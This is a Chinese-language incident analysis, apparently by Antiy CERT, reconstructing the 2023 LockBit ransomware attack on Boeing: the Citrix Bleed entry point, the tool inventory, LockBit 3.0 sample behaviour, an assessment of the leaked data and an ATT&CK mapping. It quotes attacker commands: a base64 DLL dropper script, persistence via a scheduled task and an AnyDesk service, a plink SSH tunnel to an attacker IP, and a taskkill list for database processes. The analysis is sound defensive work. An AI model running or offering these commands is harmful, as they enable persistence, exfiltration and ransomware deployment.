为有效应对RaaS+定向勒索风险,防御者需要更深入地了解定向勒索攻击的运行机理,才能构建有效的敌情想定,针对性的改善防御和响应能力。因此,择取典型案例,对此类攻击进行深度复盘极为重要。但由于相关涉我案例的分析支撑要素并不成熟,安天CERT在其他近期重大攻击案例中进行了筛选,选择了同样与LockBit组织相关,且可参考信息相对丰富的波音公司遭遇定向勒索攻击事件(以下简称本事件)展开了完整复盘分析。安天CERT长期关注和分析勒索攻击,对LockBit等攻击组织的持续关注,形成了较为系统的分析积累,依托安天赛博超脑平台的情报数据,CISA等机构对本事件公布的相关公开信息展开工作。从攻击过程还原、攻击工具清单梳理、勒索样本机理、攻击致效后的多方反应、损失评估、过程可视化复盘等方面开展了分析工作,并针对事件中暴露的防御侧问题、RaaS+定向勒索的模式进行了解析,并提出了防御和治理方面的建议。 2.事件背景和报告形成过程 2023年10月下旬,波音公司成为了RaaS+定向勒索攻击的受害者[1]。由于LockBit是通过RaaS模式运营的攻击组织,本次攻击事件的实际攻击者暂时无法确认。2023年10月27日,LockBit所属的受害者信息发布平台发消息声称窃取了波音的大量敏感数据,并以此胁迫波音公司,如果不在2023年11月2日前与LockBit组织取得联系,将会公开窃取到的敏感数据。此后,波音一度从受害者名单中消失,直至11月7日,LockBit组织再次将波音公司列入受害者名单中,并声称波音公司无视其发出的警告,威胁要发布大约4GiB的数据。可能因双方谈判失败,LockBit组织于11月10日公开发布了从波音公司窃取到的21.6 GiB数据(媒体报道为43 GiB,系重复计算了压缩包和展开后的数据)。 安天长期持续跟踪和响应了从勒索软件传播到定向勒索攻击的活动演进。在历史分析成果中,对“勒索软件和蠕虫的合流”、“定向勒索将接近APT攻击水准”等,都发出了风险预警(参见附录四)。针对LockBit的本次攻击波,安天于11月17日以《LockBit 勒索软件样本分析及针对定向勒索的防御思考》[2]为题,发布了本报告的V1.0版。由于当时缺少相对丰富的信息,在技术层面仅展开了样本分析工作,并未进行攻击过程复盘。波音公司被勒索攻击之后,美国网络安全和基础设施安全局(CISA)对事件进行了取证调查,并于2023年11月21日发布了相关报告[3],相关报告给出了高质量的形式化情报,为分析复盘攻击事件提供了极为重要的参考,我们结合历史工作积累其他开源情报和对本报告进行完善。 3.LockBit攻击组织的历史情况和部分历史攻击事件 3.1 组织基本情况 LockBit组织最早于2019年9月被发现,因其加密后的文件名后缀为.abcd,而被称为ABCD勒索软件;该组织在2021年6月发布了勒索软件2.0版本,增加了删除磁盘卷影和日志文件的功能,同时发布专属数据窃取工具StealBit,采用“威胁曝光(出售)企业数据+加密数据”双重勒索策略;2021年8月,该组织的攻击基础设施频谱增加了对DDoS攻击的支持;2022年6月勒索软件更新至3.0版本,由于3.0版本的部分代码与BlackMatter勒索软件代码重叠,因此LockBit 3.0又被称为LockBit Black,这反映出不同勒索攻击组织间可能存在的人员流动、能力交换等情况。使用LockBit RaaS实施攻击的相关组织进行了大量攻击作业,通过第三方获取访问凭证、漏洞武器化和搭载其他恶意软件等方式入侵至受害者系统后投放勒索软件,大量受害者遭受勒索和数据泄露。LockBit攻击组织在2022年实施的多次勒索攻击活动及影响突显了其为该年度全球最活跃的勒索攻击组织,甚至主动采取了传播和PR活动。该组织面向Windows、Linux、macOS、以及VMware虚拟化平台等多种主机系统和目标平台研发勒索软件,其生成器通过简单交互即可完成勒索软件定制。LockBit勒索软件仅对被加密文件头部的前4K数据进行加密,因此加密速度明显快于全文件加密的其他勒索软件,由于在原文件对应扇区覆盖写入,受害者无法通过数据恢复的方式来还原未加密前的明文数据。 表3-1 LockBit攻击组织基本情况 组织名称 LockBit 组织曾用名 ABCD 出现时间 2019年9月 典型突防方式 钓鱼攻击、第三方获取访问凭证、漏洞武器化和搭载其他恶意软件 典型加密后缀 字母与数字随机组合的9位个人ID 解密工具 暂未发现公开的解密工具 加密目标系统 Windows,Linux,macOS,VMware等 运营方式 勒索即服务,基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、DDoS干扰服务 常见针对行业 金融业,居民服务业,建筑业,教育,信息传输、软件和信息技术服务业,制造业 常见国家/地区 美国、英国、德国、加拿大 是否多重组合勒索 是 LockBit勒索组织的RaaS服务成为攻击者实施网络勒索行为的犯罪工具。这些攻击者通过利用多种手段,其中包括第三方获取访问凭证、漏洞武器化,以及搭载其他恶意软件等方式,成功实现对受害系统的初始访问。一旦入侵成功,攻击者的下一步行动通常涉及窃取数据文件,并随后投放LockBit勒索软件,将目标系统的数据文件进行加密,继而实施勒索。 3.2 历史勒索攻击情况 LockBit勒索组织的规模庞大,拥有众多附属成员。其Tor网站几乎每天都在更新,新增来自世界各地的受害者信息。这个组织采用了一种双重勒索策略,即“威胁曝光企业数据+加密数据勒索”,进一步加剧了攻击的危害程度。在Tor网站上,LockBit组织已经发布了超过2200条受害企业信息,仅在2023年,已经发布了1000余条受害企业信息。这仅仅是公开信息,而实际受害企业数量可能远超过这个数字。值得关注的是,攻击者与受害企业有时会选择通过私下谈判的方式解决问题,而不在Tor上公开受害企业信息。这意味着实际受害企业数量可能远远超过已公开的信息,这加剧了LockBit组织对企业和机构的网络安全威胁。 4.事件过程完整复盘分析 为了让防御者更深入了解定向勒索攻击的运行机理,有针对性的改善防御和响应能力,安天CERT以对LockBit攻击组织的历史分析成果为基础,参考CISA取证报告等开源情报,综合运用多种分析方法和手段,对LockBit组织针对波音公司的勒索攻击进行了复盘,分析了勒索样本,梳理了攻击工具清单,对攻击致效后的情况和损失进行了分析,并对攻击杀伤链与技战术图谱进行了分析。 4.1 攻击过程复盘 步骤1:LockBit勒索组织(后称攻击者)针对波音公司的Citrix NetScaler ADC 和 NetScaler Gateway 设备发动漏洞利用攻击,窃取有效用户的访问cookie。该漏洞无需额外权限,攻击者可在不需要任何权限的前提下,构造特定的数据包造成缓冲区溢出,可从 Citrix NetScaler ADC 和 NetScaler Gateway 中越界检索身份验证会话 cookie等信息,通过cookie绕过身份验证,获取系统web登录权限,通过web功能配置植入木马进行信息窃取或勒索软件进行勒索攻击。 Citrix NetScaler ADC 和 NetScaler Gateway 均提供网关服务,其web管理界面可对http、dns进行详细的管理和配置,可篡改用户数据实现投毒,可对插件进行恶意更换,用户安装被恶意更换的插件后即可被控。 步骤2:攻击者利用窃取的cookie实现对波音公司边界服务器的访问,植入运行脚本123.ps1,实现释放并执行Downloader木马,从C2中下载各种远程软件、脚本、网络扫描等武器装备,Downloader可远程获取的装备清单如表4-1所示。 123.ps1脚本内容如下,功能为拼接base64编码,解码生成adobelib.dll文件(Downloader木马),以特定十六进制字符串作为参数加载该Downloader木马: $y = "TVqQAAMA..." $x = "RyEHABFQ..." $filePath = "C:\Users\Public\adobelib.dll" $fileBytes = [System.Convert]::FromBase64String($y + $x) [System.IO.File]::WriteAllBytes($filePath, $fileBytes) rundll32 C:\Users\Public\adobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44 步骤3:攻击者将恶意dll文件配置为计划任务和将AnyDesk远程软件配置成服务来实现持久化访问该入口。AnyDesk是一款由德国公司AnyDesk Software GmbH推出的远程桌面软件。用户可以通过该软件远程控制计算机,同时还能与被控制的计算机之间进行文件传输,主要应用于客户日常运维和业务相关主机的远程管理。这一软件是常用网管工具、由正规软件研发企业发布,且有对应厂商数字签名,往往被作为白名单软件。但这也使攻击组织在活动中利用这类软件的远程管理功能实现持久访问、文件传输,并利用其是合法签名执行体来规避检测。 服务创建及计划任务添加所使用的命令如下: schtasks.exe /create /tn " UpdateAdobeTask " /sc MINUTE /mo 10 /tr "'Mag.dll '" /f sc create AnyDesk binpath= c:\perflogs\ AnyDeskMSI.exe type=own start=auto displayname=AnyDesk 安天 AVL SDK 反病毒引擎检测到AnyDesk后,会反馈输出 Riskware/Win32. AnyDesk作为命名,便于提醒网管判断是正常应用还是攻击者投放。 步骤4:攻击者使用合法的网络扫描工具探测目标内部网络服务,通过ADRecon脚本(ad.ps1)收集AD域信息,利用tniwinagent工具(信息收集)收集其他主机信息。ADRecon 是由澳大利亚信息安全服务提供商Sense of Security开发的一种收集有关 Active Directory 信息并生成报告的工具,该报告可以提供目标 AD 环境当前状态的整体情况。该工具采用PowerShell脚本语言编写,于2018年在Github开源。基于域环境信息收集功能,易被攻击者利用,其中FIN7黑客组织曾使用过该工具[4]。 安天 AVL SDK 反病毒引擎检测到的ADRecon后,会反馈输出 HackTool/PowerShell.ADRecon作为命名,便于提醒网管判断是正常应用还是攻击者投放。 步骤5:攻击者使用proc.exe(进程dump)工具获取lsass.exe进程内存,结合Mimikatz工具获取系统中的各类凭证;使用veeam-get-creds.ps1脚本从波音公司的veeam平台中获取保存的凭证;使用secretsdump.py从波音公司的Azure VM上获取各种账号数据库文件及注册表信息。相关使用命令如表4-2所示。 Mimikatz(Mimikatz)是一款黄帽子(黑客)工具,最初由法国黑客Benjamin Delpy开发,并于2011年首次发布,该工具除了可执行文件版本外还存在脚本类型版本。Mimikatz的主要功能是获取和操控Windows操作系统中的凭证,如用户登录密码、Windows登录凭据(NTLM哈希和Kerberos票据)以及各种应用程序和服务的凭证。Mimikatz设计的目的是揭示Windows系统中密码和凭证管理的薄弱点,并用于安全专业人员的演示和教育目的。然而,由于其功能强大且广泛被黑客所利用,Mimikatz也被视为危险的工具,用于进行恶意攻击、数据窃取和潜在的勒索活动。凭借其高度灵活和兼容性,Mimikatz已被APT组织或网络犯罪组织应用于攻击活动中,其中安天于2020年监测到苦象组织使用PowerShell脚本形式的Mimikatz工具[5]。 安天 AVL SDK 反病毒引擎检测到的Mimikatz后,会反馈输出 HackTool/Win32.Mimikatz、HackTool/Win64.Mimikatz或Trojan/PowerShell.Mimikatz作为命名,便于提醒网管判断是正常应用还是攻击者投放。 ProcDump 是一个命令行实用程序,是Sysinternals Suite 系统组件的一部分,其主要目的是监视应用程序的 CPU 峰值并在峰值期间生成故障转储,管理员或开发人员可以使用它来确定峰值的原因。ProcDump 还包括挂起窗口监视(使用与 Windows 和任务管理器使用的窗口挂起相同的定义)、未处理的异常监视,并且可以根据系统性能计数器的值生成转储。它还可以用作通用进程转储实用程序,将其嵌入到其他脚本中。在本次事件中,该工具被攻击者利用其白名单特性及进程转储功能,结合Mimikatz工具获取系统凭证。 安天 AVL SDK 反病毒引擎检测到对应版本的ProcDump后,会反馈输出 RiskWare/Win32.ProcDump或RiskWare/Win64.ProcDump作为命名,便于提醒网管判断是正常应用还是攻击者投放。 步骤6:攻击者利用获取的各种凭证结合Psexec工具(远程命令执行),在波音内部网络其他主机上部署各种远程软件,获取更多其他服务器及主机的访问权限。Psexec是一个命令行网络管理工具,是Sysinternals Suite系统组件的一部分,其调用了Windows系统的内部接口,以远端Windows主机账户名、密码和要执行的本地可执行文件为输入参数,基于RPC$服务实现,将本地可执行文件推送到远端主机执行,其设计初衷是为了便于网络管理人员以实现敏捷的远程运营。但由于其作为命令行工具便于被调用封装,也导致极易被攻击者作为攻击工具使用,在完成口令破解后,实现一次性投放执行。早在2003年,广泛出现大量基于空口令和常见口令进行传播的系列“口令蠕虫”,大部分都使用了这个机制。特别是出品该系统组件的Sysinternals的团队在2006年7月18日被微软收购,导致其后续版本都带有微软的数字签名,所以也连带导致其会被较大比例的安全软件放行。 安天AVL SDK反病毒引擎检测到对应版本的Psexec后,会反馈输出 RiskWare/Win32.Psexec或RiskWare/Win64.Psexec作为命名,便于提醒网管判断是正常应用还是攻击者投放。 步骤7:利用远程访问软件传输步骤4至步骤6涉及的各种工具,循环执行步骤4至步骤6的各种操作,尽可能获取更多服务器及主机的访问权限。 步骤8:从已控制的系统中收集各种信息(包括备份文件等),并使用7z.exe工具进行压缩。 步骤9:通过plink.exe工具建立的SSH隧道回传数据;通过FTP协议回传数据(193.201.9[.]224);通过远程控制软件回传数据。pink.exe工具是PuTTY软件中的一个组件,主要功能类似于Linux系统上的ssh命令行工具,用于SSH连接远程主机,同时提供多种方式创建或管理SSH会话。由于其属于PuTTY软件的一个组件,具备数字签名,能够规避以数字签名作为白名单检测机制的终端防护软件的检测。 攻击者使用如下命令格式实现SSH隧道建立: echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 @168.100.9[.]137 -pw 步骤10:结束相关主机的数据库服务及进程、杀毒软件、其他阻碍勒索加密的进程。 攻击者使用如下命令结束相关进程及服务: cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex 步骤11:将LockBit 3.0勒索软件通过远程控制软件部署到目标主机(数据价值高的、业务重要性强的)中并执行,实现加密勒索。对目标加密完成后,释放勒索信并修改桌面背景用以提示受害者,便于受害者根据勒索信中预留的联系方式与攻击者进行谈判,谈判内容包括支付赎金的数额和支付方式等。 4.2 攻击工具清单梳理 在本次攻击事件中,攻击者利用Citrix设备相关的CVE-2023-4966漏洞作为突破口,入侵后组合利用多种攻击装备实现网络攻击,例如使用多种带有数字签名的远程控制软件与受害系统建立远程连接,实现传播其他攻击装备;利用Process Hacker实现禁用和卸载与安全软件有关的进程和服务;通过ProcDump工具转储进程内存,结合Mimikatz实现凭证获取,使用NetScan进行网络扫描,用以发现与网络有关的信息等,攻击装备具体使用情况见下表: 表4-3 攻击装备使用情况 装备类型 名称 装备来源 备注 漏洞利用 Citrix Bleed(CVE-2023-4966) 自研漏洞利用代码 Citrix NetScaler ADC 和 NetScaler Gateway 设备的软件漏洞 脚本 123.ps1 自研脚本 解码并释放Downloader木马 ad.ps1 开源脚本(Github) AD域侦察脚本,收集域内各种信息 veeam-get-creds.ps1 开源脚本(Github) 从Veeam平台获取保存的凭证信息 secretsdump.py 开源脚本(Github) 从Azure VM上获取各类账户数据库信息(凭证) sysconf.bat 自研脚本 用于执行plink 黑客工具 processhacker.exe 公开软件 禁用和卸载与安全软件有关的进程和服务 mimikatz.exe 开源软件 从内存和进程转储文件中获取凭证 进程转储 proc.exe 公开软件 通过ProcDump工具转储lsass.exe内存,结合Mimikatz实现凭证获取 网络扫描 netscan.exe 公开软件 重命名Softperfect公司的网络扫描软件,实现网络扫描功能 端口转发 servicehost.exe 公开软件 重命名的plink(PuTTY Link),用于端口转发建立SSH隧道 远程执行 psexec.exe 公开软件 用于远程部署特定程序 TNI客户端 tniwinagent.exe 公开软件 用于发现网络环境中的其他用户,收集信息 远程软件 Zoho 公开软件 远程控制软件,用于建立远程连接,实现攻击装备传播 ConnectWise 公开软件 远程控制软件,用于建立远程连接,实现攻击装备传播 Screenconnect 公开软件 远程控制软件,用于建立远程连接,实现攻击装备传播 AnyDesk 公开软件 远程控制软件,用于建立远程连接,实现攻击装备传播 Splashtop 公开软件 远程控制软件,用于建立远程连接,实现攻击装备传播 Action1 公开软件 远程控制软件,用于建立远程连接,实现攻击装备传播 Atera 公开软件 远程控制软件,用于建立远程连接,实现攻击装备传播 fixme it 公开软件 远程控制软件,用于建立远程连接,实现攻击装备传播 4.3 勒索样本分析 LockBit有针对多个常见系统平台的载荷,由于并未获得本事件的实际场景运用信息,我们选择了其最新的Windows平台样本进行分析。 表4-4 恶意执行体样本卡片 病毒家族名称 Trojan[Ransom]/Win32.LockBit MD5 38745539B71CF201BB502437F891D799 处理器架构 Intel 386 or later, and compatibles 文件大小 162.00 KB (165888字节) 文件格式 BinExecute/Microsoft.EXE[:X86] 时间戳 2022-06-27 14:55:54 数字签名 无 加壳类型 无 编译语言 C/C++ VT首次上传时间 2022-07-03 16:18:47 VT检测结果 64/72 注:可在计算机病毒分类命名百科全书Virusview.net,搜索“LockBit”查看更多该病毒家族相关信息。 勒索软件执行后会释放.ico文件和.bmp文件于%PROGRAMDATA%路径下,用作后续被加密文件的图标和修改的桌面壁纸。 LockBit 3.0的代码段进行了加密,在执行后会根据传入的“-pass”命令行参数解密执行,没有密码则无法执行,用该手段来确保加密操作由攻击者在合适时点触发,同时也用来提高防御方和安全企业的分析难度。 通过NtSetThreadInformation函数将线程信息设置为ThreadHideFromDebugger,以干扰研究人员分析。 检测系统语言,如果为特定语言则退出程序,不再执行。 具体检查的语言列表如下,通过其规避的系统,可见LockBit组织本身具有较强的东欧背景特点。 表4-5 检查的语言列表 系统语言 阿拉伯语(叙利亚) 俄语(摩尔多瓦) 亚美尼亚语(亚美尼亚) 俄语(俄罗斯) 阿塞拜疆语(西里尔语阿塞拜疆) 塔吉克语(西里尔塔吉克斯坦) 阿塞拜疆语(拉丁语阿塞拜疆) 土库曼(土库曼斯坦) 白俄罗斯语(白俄罗斯) 鞑靼语(俄罗斯) 格鲁吉亚语(格鲁吉亚) 乌克兰语(乌克兰) 哈萨克语(哈萨克斯坦) 乌兹别克语(西里尔文乌兹别克斯坦) 吉尔吉斯(吉尔吉斯斯坦) 乌兹别克语(拉丁乌兹别克斯坦) 罗马尼亚语(摩尔多瓦) 创建多个线程进行加密,并将线程设置为隐藏。LockBit勒索软件仅对被加密文件头部的前4K数据进行加密,因此加密速度明显快于全文件加密的其他勒索软件,由于在原文件对应扇区覆盖写入,受害者无法通过数据恢复的方式来还原未加密前的明文数据。 勒索攻击后用户的桌面背景被替换,图片内容为醒目的黑底白字,以增加用户恐慌和压迫感,内容为告知用户的重要文件遭遇窃取和加密,让用户打开对应的文本文件,并按照文本文件中的要求进行操作。 对应的文本文件即为勒索告知信,其中再次告知用户数据失窃并被加密,恐吓用户如果不缴纳赎金,数据会被放到Tor暗网售卖。信件中包含用于赎金谈判的Tor地址。 4.4 攻击致效后的情况分析 2023年10月27日18时19分,攻击者将波音公司相关信息发布在LockBit勒索软件的Tor网站上并以此胁迫波音公司,如果不在2023年11月2日前与LockBit组织取得联系,将会公开窃取到的敏感数据。此后,波音公司一度从受害者名单中消失,疑似波音与LockBit进入了谈判过程。 2023年11月2日,波音公司声明其客户服务网站services.boeing.com,因技术原因暂停服务,但不影响飞行安全。 2023年11月7日,LockBit组织再次将波音公司列入受害者名单中,并声称波音公司无视其发出的警告,并威胁要公开约4GiB的数据。 2023年11月10日,LockBit组织公开发布从波音公司窃取到约21.6 GiB数据,这些文件包括IT管理软件的配置备份以及监控和审核工具的日志,其中包含Citrix设备的相关文件。从数据清单来看,多数为IT场景、安全产品和设备的相关数据与日志。 4.5 损失分析 为了更准确分析数据泄露所带来的风险,安天工程师对相关信息进行了进一步梳理。根据媒体报道,所泄露的文件共计64个,数据约43 GiB。攻击者初始发布的数据包含21.6 GiB压缩包文件及解压后的全部文件,而最初压缩包内的文件列表未提供,导致大部分网络安全新闻报道时将压缩包和包内文件进行了重复计算,即约43 GiB的数据。LockBit于2023年12月19日在受害者信息及数据发布平台上发布了压缩包中的解压文件列表。经对比分析为重复数据。因此,本报告认定的数据以压缩包大小约21.6 GiB为准,我们基于文件大小、文件类型、使用的部门及可能带来的风险展开分析,本分析是基于攻击者公布的文件列表中的信息完成的,存在一定猜测成分。 1、文件大小分析 (1)大于500MiB 的文件:11个,共计41.1 GiB,最大文件是21.6 GiB(该文件为所有文件的压缩包,即媒体误公布数据为43GiB的原因),最小文件1.2 GiB。其中,IT管理系统备份数据4.1 GiB,2018年数据存储库备份数据2.8 GiB,存储库安全组件数据1.3 GiB,分布式虚拟机软件数据2.5GiB,IT解决方案数据1.2 GiB,语音数据4.5 GiB,所有数据的压缩包文件21.6 GiB,其它数据3.1 GiB,Citrix云计算虚拟化软件系统数据770.5MiB、应用程序管理软件505.1MiB,应用程序控制数据588.1MiB。 (2)小于500MiB的文件:53个,最大文件是960.5KiB,最小文件是5.6KiB。其中涉及商业审计、视频监控、数字无线通讯、Citrix云计算虚拟化软件、数据库管理、系统审计工具、ERP管理、波音网站目录树、仿真软件、路径导航软件、实时通信软件、邮箱数据、HP打印审计软件、IT管理系统软件、智能仓储管理系统、文档管理系统等疑似配置文件数据。 2、文件相关内容分析 涉及的软件类型有30种,包括商业审计、视频监控、应用程序管理软件、数字无线通讯设备、波音公司邮箱、波音公司开发的软件、Citrix云计算、虚拟化软件、数据库管理软件、数据中心管理软件、网络安全软件、OpenStack私有云部署软件、HP打印审计软件、IT管理系统软件、数据备份软件、分布式虚拟机软件、企业IT解决方案软件、云语音识别软件、虚拟化软件、系统审计工具、系统日志记录工具、智能仓储管理系统、虚拟化系统、ERP管理软件、文档管理系统、波音网站数据、仿真软件、疑似授权文件、路径导航系统软件、实时通信软件及其它不确定类型。 3、涉及部门分析 通过文件属性分析,对应的内部使用者,疑似涉及的部门有:12个,包括财务部门、安全运营部门、调度部门、客服部门、IT运营部门、飞机维护检修部门、信息安全部门、仓储物流部门、项目管理部门、研发部门、通信部门及其它不确定部门。 4、风险分析 综上,从LockBit所曝光的数据来看,尽管整体上是信息化系统和软件运行日志和备份数据为主。但可能给波音公司带来四方面风险,一是进一步的用户数据泄露风险,主要包括网站、邮箱、仓储、物流、客服等数据。二是应用软件清单暴露风险,主要包括审计、视频监控、通讯、打印、ERP、文档管理、导航、调度、仓储物流等软件。三是安全运营风险,主要包括应用程序管理、Citrix云计算、虚拟化、数据库管理、数据中心管理、安全软件、私有云、网管软件、数据备份等失控风险。四是研发数据风险,主要包括仿真设计和项目研发等数据。 经过上述分析,我们认为实际风险可能大于波音自身所公布的风险提示,并特别需要研判是否会对飞行安全带来风险。 4.6 攻击的杀伤链与技战术图谱分析 LockBit勒索软件组织代表了网空威胁的一种典型形式,具备较为完备攻击支持体系、模块化攻击装备和规模化运营团队。在这些资源的支持下,他们得以能够为高度复杂的攻击活动提供支撑。仅仅关注漏洞、恶意代码等单一环节的分析无法全面理解这类攻击组织的整体过程,也难以为防御提供有效的指导。为了有效抵御超高能力网空威胁行为体的攻击威胁,安全人员需要采用系统化、框架化的威胁分析模型,以深入、全面地分析这些威胁行为,理解攻击者的手法,从而实现更加有效的防御。 安天以网空威胁框架ATT&CK为参考,对此次事件的各阶段行为进行标准化描述和分类,协助分析攻击者的意图和行为,为相关防御工作的开展提供借鉴和参考。通过复盘分析发现,此攻击是基于Citrix的CVE-2023-4966漏洞,对Citrix NetScaler ADC和NetScaler Gateway相关设备实现初始访问,后续再组合利用多种工具实现多种恶意行为,包括窃取凭证、横向移动、访问数据资源、窃取数据和加密数据的复杂杀伤链过程。 本次事件对应ATT&CK各个阶段及具体行为如下表所示: 表4-6 LockBit勒索攻击战术行为列表 ATT&CK阶段 具体行为 注释 初始访问 利用面向公众的应用程序 通过CVE-2023-4966漏洞入侵Citrix NetScaler ADC和NetScaler Gateway设备 执行 利用命令和脚本解释器 通过PowerShell执行恶意脚本文件123.ps1 利用计划任务/工作 通过计划任务执行特定恶意程序 利用系统服务 使用PsExec来执行命令或有效负载 利用Windows管理规范(WMI) 使用wmiexec.exe执行特定命令 持久化 利用自动启动执行引导或登录 通过将AnyDeskMSI.exe添加自启动服务以实现持久化 提权 利用漏洞提权 通过CVE-2023-4966漏洞提升权限 防御规避 执行范围保护 输入正确的参数会解密主要组件 削弱防御机制 使用Process hacker工具来禁用和卸载与安全软件有关的进程和服务 删除信标 清除系统事件日志文件,勒索软件自删除 修改身份验证过程 通过CVE-2023-4966漏洞绕过MFA以实现后续恶意行为 混淆文件或信息 混淆代码用以下载黑客工具;向特定C2地址发送混淆加密过的数据 凭证访问 从存储密码的位置获取凭证 使用veeam-get-creds.ps1脚本获取Veeam凭证并解密;使用Mimikatz窃取凭证 修改身份验证过程 通过CVE-2023-4966漏洞绕过MFA,劫持Citrix NetScaler ADC和NetScaler Gateway设备上的合法用户会话,实现凭证访问 操作系统凭证转储 通过ProcDump工具转储进程内存,结合Mimikatz实现凭证获取 窃取Web会话cookie 窃取Web应用会话cookie,在NetScaler设备内建立经过身份验证的会话 发现 发现域信任 利用ADRecon从域环境中提取信息 扫描网络服务 利用NetScan扫描与网络相关的服务项 发现网络共享 利用NetScan发现网络共享路径 发现远程系统 利用NetScan发现网络环境中其他远程系统 发现系统信息 获取系统内存信息和有效的NetScaler AAA会话cookie;不会感染系统语言设置与定义的排除列表相匹配的计算机;枚举系统信息,包括主机名、主机配置、域信息、本地驱动器配置、远程共享和安装的外部存储设备 发现系统地理位置 不会感染系统区域设置与定义的排除列表相匹配的计算机 发现系统所有者/用户 通过tniwinagent.exe发现网络环境中的其他用户 横向移动 远程服务会话劫持 通过CVE-2023-4966漏洞劫持合法用户会话 利用远程服务 通过获取到的访问凭证,结合利用PsExec实现横向移动 收集 远程服务会话劫持 通过CVE-2023-4966漏洞劫持合法用户会话 利用远程服务 通过获取到的访问凭证,结合利用PsExec实现横向移动 命令与控制 使用应用层协议 使用FTP协议从受害系统向外传输数据 使用协议隧道 使用PuTTY Link执⾏SSH操作 利用远程访问软件 使用Action1、Atera、Fixme it、Screenconnect、AnyDesk、Splashtop、Zoho assist和ConnectWise等工具进行远程控制 数据渗出 自动渗出数据 使用StealBit自定义渗透⼯具从目标网络自动窃取数据 影响 损毁数据 删除日志文件并清空回收站 造成恶劣影响的数据加密 对目标系统上的数据进行加密,以中断系统和网络的可用性 篡改可见内容 将主机系统的壁纸和图标分别更改为LockBit 3.0壁纸和图标 禁用系统恢复 删除磁盘上的卷影副本 禁用服务 终止特定进程和服务 梳理总结后,我们将该事件中涉及的威胁行为技战术映射到ATT&CK图谱中。 4.7 攻击过程小结、损失评价与可视化过程复盘 上述分析表明,这是一起基于LockBit勒索攻击组织所提供的RaaS基础设施的针对知名企业的定向勒索攻击事件。攻击者以ADC网络边界设备为初始突防点,把握了相关设备在出现漏洞后未及时响应带来的机会窗口,在相关漏洞利用代码出现后,在第一时间发掘利用,以此实现凭证窃取。之后利用凭证完成进一步的横向移动和向场景中按需投放的落地能力。攻击组织运用了大量开源和商用工具作为实现不同功能的攻击组件,并通过突破域控等关键主机,实现进一步的凭证权限窃取,实现准确和有效投放,窃取了所攻陷主机的相关数据,实现了勒索软件部署。 仅从LockBit所公布的数据来看,主要是相关配置、运营、IT、安全相关的数据,似不包含关于相关技术、工艺、生产、商务等相关的文档、数据。我们猜测存在两种可能: 1、攻击者突破了波音在线服务体系的管理运营,并未进入到实际科研、生产、财务等位置。 2、攻击者仅公布了其中的相对低的价值数据,而将高价值数据继续作为和波音未来谈判的筹码,待价而沽。 安天CERT相对倾向原因为第一种,但如损失分析一节中所述,依然可能多方面有更为严重的风险后果。 根据上述总结分析,安天态势感知平台可视化组件生成了攻击行动复现演示动画。由于安天未参与涉事公司的应急响应及取证,且涉事公司披露情况不全面,因此对本次LockBit攻击组织勒索波音公司事件的可视化复盘并不一定完全与攻击者实际攻击过程匹配,复盘中的网络拓扑、攻击过程及攻击手段存在猜想和推测。 5.波音遭遇勒索事件显露出的攻击趋势 5.1 事件中暴露的防御侧问题 安天CERT通过对波音遭遇勒索攻击事件进行复盘,结合最近两年的多起APT和定向勒索攻击事件的关联分析,对相关攻击技术的几大趋势做出以下判断: ——暴露面/可攻击面的梳理需要更加深化和清晰。 波音事件的初始攻击入口是通过ADC网关设备的cookie漏洞来获取凭证。在传统攻击中,cookie凭证窃取并不罕见,但与本次突防一体的相关运用方式并不多见。 收敛暴露面和可攻击面一直是网络安全防御重要的基础工作,因此也更容易停留在一些浅层次的理解上。如把工作简单视为:对面向互联网侧开放服务及端口的梳理,以及类似电子邮件地址等可导致攻击投放的入口与泄露情况的梳理。但在资产广泛云化、移动办公、泛在接入的背景下,以及业务形态日趋数字化和依赖互联网的发展趋势下,在接入层面、业务层面,都会出现一系列新的暴露面,包括随着攻击方在运营商和流量侧入侵布局的能力和对网关等设备入侵能力的增强,即使是轻量级的网络访问和网络业务,也同样要做暴露面的梳理。在数字化转型和各种办公通讯应用的部署过程中,也带来了更多的API层面的暴露风险。 ——攻击者对漏洞资源的利用效率远胜于防御方。 本事件用于突防的CVE-2023-4966漏洞的利用代码(POC)10月26日在Github上出现,27日攻击者宣布入侵波音成功。我们倾向攻击发生在POC代码公开后。Citrix 已于10月10日修复,但波音等机构并未进行修补。这反映出攻击者对漏洞资源的运用效率和敏感性远胜于防御方。 由于攻击者能熟练使用网络空间测绘引擎的等开源情报,并长期关注积累对重要信息目标的暴露面,因此在POC代码出现后,会有一大批攻击者快速匹配寻找可突防目标。从漏洞的角度看,此前关于0day-1day-Nday的概念,更多还是建立在漏洞发布或公开的时点上,但POC代码被公开,则更是其中需要高度关注的节点,其意味着利用难度瞬间降低,攻击活动的高峰会迅速到来。安天CERT把类似攻击称为1Exp攻击。由于RaaS+定向勒索本身又构成了一种“众筹犯罪”模型,导致关注不同目标资源或拥有目标信息资源的大量攻击者,都可能在发现机会窗口时尽可能的将机会窗口转化为实际收益。 ——安全产品本身极易成为攻击突破口。 攻击者在此次事件中实现突防的ADC设备,并非单纯的应用设备,而是具有一定安全功能,且能对通过的流量进行一定安全过滤的设备。但在越来越多的类似攻击中,明确暴露出这样一个事实:安全产品(设备)或具有一定安全能力的产品(设备)其本身并非是更加安全的,其整体的设计机理都是将安全能力作用于外部环境对象或者流量对象,并未将自身作为可能被攻击者所攻击的目标来强化自身的安全特性。同时,这些产品(设备)在现实应用中,又因其带有安全功能,往往给用户带来了“其自身是安全的”的认知错觉,从而使其更容易成为攻击者的突破点。 ——攻击者的关键作业点不只是最终的资产价值点。 通过本次波音事件中,从攻击者攻击带有可获取凭证能力的可攻击点,攻击内部域控节点,以获取相关凭证的活动来看,不能简单地把攻击视为一个在实现了初始突防后进行大面积内网扫描与横向移动以扩大资产价值的手段。显然,在攻击路径中存在着一些比普通可攻击主机具有更强的辅助后期攻击作用的关键节点,例如:攻陷防火墙等网关设备可以实现流量劫持和重定向,攻击域控服务器可以获取资产的登录凭证,攻击网络管理人员的节点可以获取访问服务器的跳板节点或控制权。因此,纵深防御和资源分配不应只是基于拓扑和资产分布的均匀分配,而应形成针对性、有重点的资源投放。 